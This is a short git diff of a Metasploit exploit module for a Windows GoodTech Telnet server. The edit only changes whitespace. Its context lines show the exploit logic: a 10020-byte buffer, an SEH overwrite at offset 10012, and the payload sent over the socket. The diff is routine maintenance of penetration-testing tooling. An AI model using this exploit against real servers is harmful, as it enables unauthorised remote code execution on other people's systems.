diff --git a/modules/exploits/windows/misc/goodtech_telnet.rb b/modules/exploits/windows/misc/goodtech_telnet.rb index 1429ffd4ab..25da243da7 100644 --- a/modules/exploits/windows/misc/goodtech_telnet.rb +++ b/modules/exploits/windows/misc/goodtech_telnet.rb @@ -50,15 +50,16 @@ class Exploits::Windows::Misc::Goodtech_Telnet < Msf::Exploit::Remote connect sploit = Rex::Text.rand_text_english(10020, payload_badchars) - seh = generate_seh_payload(target.ret) - sploit[10012, seh.length] = seh + seh = generate_seh_payload(target.ret) + + sploit[10012, seh.length] = seh print_status("Trying target #{target.name}...") sock.put(sploit + "\r\n\r\n") handler - disconnect + disconnect end end